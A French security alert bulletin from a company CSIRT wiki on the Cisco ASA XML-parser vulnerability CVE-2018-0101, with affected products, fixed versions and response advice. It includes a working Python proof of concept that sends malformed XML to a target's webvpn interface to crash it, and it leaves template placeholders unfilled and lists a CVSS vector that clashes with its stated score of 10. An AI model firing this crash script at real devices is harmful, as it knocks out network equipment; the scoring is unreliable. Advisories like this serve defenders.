CSIRT-DCP-ALE-2018-002

De Docaposte Cyberdéfense
Révision datée du 7 février 2018 à 21:09 par Scarpentier (discussion | contributions) (Documentations et informations techniques)
Aller à : navigation, rechercher
Bulletin d'alerte de sécurité du CSIRT DOCAPOST
Vulnérabilité dans Cisco Adaptive Security Appliance
CSIRT-DCP-ALE-2018-02


Télécharger la version PDF

Gestion du document

Date de la première version :

01/02/2018

Date de la dernière version :

07/02/2018

Version :

1.1

Source :

Bulletin de sécurité Cisco cisco-sa-20180129-asa1 du 29 janvier 2018
Agence National de la Sécurité des Systèmes d'Information (ANSSI)

Risque(s) / Impact(s)

Score CVSS

Score.png

Score de base :4.0AV:L / AC:M / Au:S / C:P / I:N / A:N

Score temporel :3.4E:POC / RL:OF / RC:C

Score Environmental :5.1CDP:ND / TD:H / CR:H / IR:ND / AR:ND
Risque(s)
  • Exécution de code arbitraire à distance
  • Déni de service à distance
Impact(s)
  • Toutes connexions VPN Web SSL

Résumé de la vulnérabilité ou de la menace

  • RESUME DE LA VULN

Vecteur(s) d'infection(s) / d'attaque(s)

  • INDIQUER LES VECTEURS


Système(s) affecté(s)

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module pour les commutateurs Cisco Catalyst série 6500 et les routeurs Cisco série 7600
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 4120 Security Appliance
  • Firepower 4140 Security Appliance
  • Firepower 4150 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software (FTD)
  • FTD Virtual

Résumé

Un chercheur du NCC Group a trouvé une vulnérabilité dans le logiciel Adaptive Security Appliance (ASA) de Cisco. En envoyant des paquets contenant du XML malformé sur une interface configurée pour accepter des communications webvpn, un attaquant peut provoquer un déni de service ou pire obtenir une exécution de code à distance.

Cette vulnérabilité est jugée critique, avec un score CVSS de 10. Elle impacte de nombreux produits de bordure de réseau, à savoir des routeurs ainsi que des pare-feux et autres produits de sécurité (cf. section Systèmes affectés). Cette vulnérabilité touche également les équipements utilisant le logiciel Firepower Threat Defense (FTD) à partir de sa version 6.0.0.

Le 29 janvier 2018, Cisco a publié un correctif pour cette vulnérabilité (cf. section Documentation).

Le 2 février 2018, le chercheur ayant trouvé cette vulnérabilité présentera ses travaux à l'occasion de la conférence de sécurité REcon à Bruxelles (cf. section Documentation).

Le 5 février 2018, Cisco a mis a jour le bulletin de sécurité relatif à cette vulnérabilité. Après une analyse approfondie, le constructeur a identifié de nouveaux services vulnérables. La vulnérabilité reposant sur une faiblesse de l'analyseur XML, il est possible de tirer parti de cette faille depuis plusieurs composants faisant appel à cet analyseur. La liste des systèmes et versions impactés à ainsi été mise à jour en conséquence par l'éditeur.

Le CERT-FR recommande de se reporter au bulletin de sécurité de l'éditeur (cf. section Documentation) pour obtenir une liste des composants et des configurations vulnérables. De plus, le premier correctif mis à disposition par Cisco pour cette vulnérabilité ne corrigeant que partiellement la faille, de nouvelles mises à jour de sécurité sont disponibles pour les systèmes concernés.

Une publication de blogue Cisco complétant les informations disponibles sur cette failles a également été publiée le 5 février 2018.

Contre mesure(s)

  • Mettre à jour les équipements immédiatement avec les versions suivantes :

Cisco a publié les versions suivantes du logiciel ASA qui corrigent cette vulnérabilité :

  • 9.1 : 9.1.7.20
  • 9.2 : 9.2.4.25
  • 9.4 : 9.4.4.14
  • 9.6 : 9.6.3.20
  • 9.7 : 9.7.1.16
  • 9.8 : 9.8.2.14
  • 9.9 : 9.9.1.2

Mesure(s) réactive(s)

En cas de détection d'un acte de malveillance sur les services ou équipements concernés, le CSIRT DOCAPOST recommande :

  • de désactiver la fonction VPN SSL et de planifier la mise à jour des équipements

En cas d’impossibilité de mise à jour immédiate, le CSIRT DOCAPOST recommande :

  • d'activer une surveillance des équipements vulnérables
  • de planifier la mise à jour

IoC

  • N.C

Documentations et informations techniques

  • Preuve de Concept
#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read @saidelike slides:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-
cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#
 
import requests, sys
  
headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'
 
xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
   <host-scan-reply>A</host-scan-reply>
</config-auth>
"""
 
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False)
 
print(r.status_code)
print(r.headers)
print(r.text)

Gestion détaillée du document

  • 01/02/2018 : Serge Carpentier : 1.0 : Création
  • 07/02/2018 : Serge Carpentier : 1.0 : Import dans le portail
Récupérée de « https://csirt.docapost.fr/index.php?title=CSIRT-DCP-ALE-2018-002&oldid=347 »